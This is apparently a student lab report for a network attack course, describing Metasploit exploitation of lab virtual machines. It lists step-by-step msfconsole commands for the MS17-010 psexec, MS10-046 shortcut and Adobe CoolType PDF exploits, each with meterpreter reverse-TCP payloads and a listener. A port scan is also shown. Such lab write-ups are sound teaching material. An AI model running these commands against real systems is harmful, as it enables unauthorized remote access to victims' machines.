2018-2019-2 网络对抗技术 20165322 Exp5 MSF基础应用

目录

实验内容与步骤

  • 一个主动攻击实践

    • MS08-067(失败)
    • ms17_010_psexec(成功且唯一)
  • 一个针对浏览器的攻击
    • ms10_046_shortcut_icon_dllloader
  • 一个针对客户端的攻击
    • windows/fileformat/adobe_cooltype_sing
  • 成功应用任何一个辅助模块
    • auxiliary/scanner/portscan/tcp
    • 在实验一里用了auxiliary/scanner/smb/pipe_auditor(唯一)

实验过程中遇到的问题

基础问题回答

实验总结与体会

实验内容与步骤
一个主动攻击实践
MS08-067(失败)
  • 实验环境:

    • 靶机:Windows xp sp3 中文版
    • 漏洞:exploit/windows/smb/ms08_067_netapi
    • 载荷:generic/shell_reverse_tcp
  • 选择了MS08-067安全漏洞msf > use exploit/windows/smb/ms08_067_netapi
  • 输入show targets可以查看包含该漏洞的系统靶机(基本上都不会成功呢)
  • 输入show payloads可以查看该漏洞可生成的payload类型
  • 接着进行设置
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //设置攻击载荷
msf exploit(ms08_067_netapi) > set LHOST 192.168.132.137 //kali的ip
msf exploit(ms08_067_netapi) > set LPORT 5322 //攻击端口
msf exploit(ms08_067_netapi) > set RHOST 192.168.132.136 //Windows XP机ip,特定漏洞端口已经固定
msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
msf exploit(ms08_067_netapi) > exploit //探测并攻击

  • emmm好吧……失败了。目前可以成功的靶机有Windows xp sp3英文版和win server2k,我这个中文版的估计打过补丁攻不进去了T^T

返回目录


ms17_010_psexec(成功且唯一)
  • 实验环境:

    • 靶机:Windows Server 2003 sp2
    • 漏洞:windows/smb/ms17_010_psexec(唯一)(这个漏洞针对的主要是win2003的靶机,xp和win7试过了都不行)
    • 载荷:windows/meterpreter/reverse_tcp
  • 打开控制台msfconsole
  • 输入help search查看搜索目标漏洞的格式
  • 比如说我想找一个2017年发布的、以exploit为目的、靶机系统为Windows的漏洞,那我就输入search cve:2017 type:exploit platform:Windows
  • 好多同学用了永恒之蓝成功了,我找个它隔壁的吧……就决定是你啦windows/smb/ms17_010_psexec。不过不要着急use它,我们还需要搜索一下靶机可用的管道名。
  • 首先利用use auxiliary/scanner/smb/pipe_auditor辅助模块扫描目标网段主机可用的管道名
  • 设置靶机地址set rhost 192.168.132.140
  • 设置20个线程set threads 20
  • 运行一下run
  • 可以看到有以下管道可用
  • back退出一下,可以开始准备攻击了
  • 选择一个漏洞use windows/smb/ms17_010_psexec
  • 然后输入info查看它的详细信息
  • 输入show payloads查看载荷
  • 设置攻击载荷set payload windows/meterpreter/reverse_tcp
  • 输入show options查看要设置的信息
  • 设置靶机地址set rhost 192.168.132.140
  • 设置靶机端口号set rport 445(这里一定要是445,它开放的端口才行!!)
  • 设置要利用的管道名set NAMEDPIPE netlogon
  • 开始攻击run
  • 攻击成功(激动)
  • 参考资料

返回目录

一个针对浏览器的攻击
  • 实验环境:

    • 靶机:Windows 7 x64 + IE8
    • 漏洞:exploit/windows/smb/ms10_046_shortcut_icon_dllloader
    • 载荷:windows/meterpreter/reverse_tcp
  • search ms10-046 看看该漏洞的其他exploit
  • use exploit/windows/smb/ms10_046_shortcut_icon_dllloader使用漏洞
  • show payloads显示可用攻击载荷
  • set payload windows/meterpreter/reverse_tcp选择攻击载荷
  • show options 查看配置信息
  • set LHOST 192.168.132.137 设置监听地址
  • set SRVHOST 192.168.132.137设置本地收听地址
  • set RHOSTS 192.168.132.136 设置靶机地址
  • exploit开始攻击
  • /root/.msf4/local/msf.lnk共享到win7虚拟机中,然后双击,即可在kail监听到,输入sessions查看当前会话
  • 输入sessions -i 1即可选择第一个会话,攻击成功

返回目录

一个针对客户端的攻击
  • 实验环境:

    • 靶机:Windows XP
    • 漏洞:windows/fileformat/adobe_cooltype_sing
    • 载荷:windows/meterpreter/reverse_tcp
  • search adobe查找软件漏洞
  • use windows/fileformat/adobe_cooltype_sing使用漏洞
  • show options查看要设置的项
  • set payload windows/meterpreter/reverse_tcp选择攻击载荷
  • set LHOST 192.168.132.137 攻击者地址
  • set LPORT 5322不要选择默认的4444端口,我第一次做的时候后面的操作报错:本机IP地址无法与4444端口绑定
  • set FILENAME 20165322.pdf 设置生成pdf文件的文件名
  • run生成攻击文件
  • 将生成的pdf文件导入win xp(被攻击主机)下
  • kail中输入back退出当前模块,进入监听模块
  • use exploit/multi/handler 进入监听模块
  • set payload windows/meterpreter/reverse_tcp 选择攻击载荷
  • set LHOST 192.168.132.137 设置攻击者地址
  • set LPORT 5322这里要设置与上方一样的端口号,以保证成功连接上文件。
  • exploit 攻击
  • 在靶机中打开pdf文件,在kali中输入指令ipconfig,攻击成功

返回目录

成功应用任何一个辅助模块
  • 实验环境:

    • 靶机:Windows Server 2003 sp2
    • 辅助模块:auxiliary/scanner/portscan/tcp
  • 在msfconsole中可通过命令show auxiliary查看所有的辅助模块
  • use auxiliary/scanner/portscan/tcp使用一个辅助模块
  • show options查看需要填的项
  • set RHOSTS 192.168.132.140设置靶机地址
  • set THREADS 15建立线程
  • exploit开始攻击
  • 连接成功,可以看到TCP端口开放

返回目录

实验过程中遇到的问题
  • 第一个实验中,第一次监听成功了,但是没有反弹连接成功。第二次直接连接失败

  • 查找资料以后,我在winxp里启用了服务中的server,可以找到靶机了,但没法确定服务包……报错直接鼓励我换一个靶机了简直难受。。

  • 猜测是第一次尝试触发漏洞的时候失败了,winxp系统可能直接给这个连接关了禁闭,所以第二次连都连不上了ORZ,只好换靶机。。

返回目录

基础问题回答

用自己的话解释什么是exploit,payload,encode

  • exploit:它是一个攻击模块,他负责利用安全漏洞对目标进行攻击。植入和运行攻击载荷,从而获得对靶机的远程目标系统访问权
  • payload:指在攻击程序中起关键作用的代码。
  • encode:指的可以对一段代码进行编码,从而改变代码的特征。

离实战还缺些什么技术或步骤?

在本次实验中,我们的实现环境是在关闭防火墙状态下进行的。我们通常都是操作靶机配合完成攻击,比如针对客户端软件Adobe的攻击实验里,就需要靶机运行包含payload的pdf文件才能回连成功。在自己配合的情况下靶机都十分难找了,可想而知要实际攻破一个系统的漏洞有多不容易。
返回目录

实验总结与体会

实验本身的原理和操作都挺简单的。但是要自己摸索找到一个唯一可用的漏洞或者payload还是不容易。在上面耗费了不少时间。实际操作失败了很多次,没有一一写进博客里。而且攻击成功的靶机多半都是比较旧的机子了。现在要想攻破一个开着防火墙和杀软的win10系统,感觉基本上是一件不太可能的事。

转载于:https://www.cnblogs.com/wangyaojia/p/10709873.html

2018-2019-2 网络对抗技术 20165322 Exp5 MSF基础应用相关推荐

  1. 2017-2018-2 20155314《网络对抗技术》Exp5 MSF基础应用

    2017-2018-2 20155314<网络对抗技术>Exp5 MSF基础应用 目录 实验内容 实验环境 基础问题回答 预备知识 实验步骤--基于Armitage的MSF自动化漏洞攻击实 ...

  2. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

  3. 2018-2019-2 20165234 《网络对抗技术》 Exp5 MSF基础应用

    实验五 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器 ...

  4. 2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用

    实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践(1分) ms08_067; (失败) MS17-010永 ...

  5. 2018-2019-2 网络对抗技术 20165322 Exp8 Web基础

    2018-2019-2 网络对抗技术 20165322 Exp8 Web基础 目录 实验原理 实验内容与步骤 Web前端HTML Web前端javascipt Web后端:MySQL基础:正常安装.启 ...

  6. 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/m ...

  7. 2018-2019-2 20165332《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165332<网络攻防技术>Exp5 MSF基础应用 1.基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是 ...

  8. 2019-2020-2 20175 212童皓桢《网络对抗技术》Exp6 MSF基础应用

    2019-2020-2 20175212童皓桢<网络对抗技术> Exp6 MSF基础应用 目录 1. 实验目标 2. 实验内容 2.1 主动攻击实践 2.2 针对浏览器的攻击 2.3 针对 ...

  9. 2018-2019-2 《网络对抗技术》Exp5 msf 20165222

    本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 总计:主动:ms17_010永恒之蓝(成功): 浏览器:office_word_hta(成功): 客户 ...

  10. 2018-2019-2 网络对抗技术 20165322 Exp9 Web安全基础

    2018-2019-2 网络对抗技术 20165322 Exp9 Web安全基础 目录 实验内容与步骤 (一)Webgoat安装 (二)SQL注入攻击 1.命令注入(Command Injection ...

最新文章

  1. 牛!何恺明包揽2项ICCV 2017最佳论文奖!这位高考状元告诉你什么是开挂的人生
  2. 所有的科学知识都是不确定的
  3. IBM又双叒叕要分拆了,IT基础设施部门将剥离,未来专注云计算和AI
  4. CCNA 2 chapter
  5. [No0000176]Git常用命令速查表(收藏大全)
  6. java6:流程控制
  7. 腾讯TAD Sim2.0领跑自动驾驶仿真市场 双擎驱动构建新一代仿真平台
  8. 【离散数学】实验 旅行路线规划问题
  9. jquery ajax示例_jQuery AJAX JSP Servlet Java示例
  10. 2022年全球差旅费管理系统行业分析报告
  11. python自动排版公众号_GitHub - qfwc258/maxpress: MaxPress:MarkDown+Python实现微信公众号一键排版...
  12. amd编码器 hevc_HEVC/H.265硬件编码器实现杂谈
  13. dts音效大师安卓版_dts音效大师手机app下载-dts音效大师安卓手机app下载-电玩之家...
  14. 基于opengl编写简单的二维绘图软件
  15. 全国多年太阳辐射空间分布数据1981-2022年、气温分布数据、蒸散量数据、蒸发量数据、降雨量分布数据、日照数据、风速数据
  16. 影片剪辑app android,猫饼剪辑app
  17. 修复windows系统引导
  18. 滴滴资深分析专家:数据如何驱动业务增长
  19. diskgenius创建efi分区_手动创建EFI分区安装系统|重装系统前EFI分区教程
  20. 如何确认RNA的质量?附RNA提取实验方法技巧分析

热门文章

  1. 职场中相信“付出总有回报”的人,后来都怎么样了?
  2. 非常认真地完成现有工作,却得不到加薪待遇?
  3. (原)数据结构之树状数组详解
  4. PythonWEB框架之Tornado
  5. 详解Java异常Throwable、Error、Exception、RuntimeException的区别
  6. Thinkphp twig
  7. JSP/Servlet-----charset 、pageEncoding差别
  8. Hibernate【2】——封装工具、HibernateUtil类以及DAO层的BaseDAO类
  9. SQL Server 2005 应用 全文搜索
  10. 去除Win10快捷图标小箭头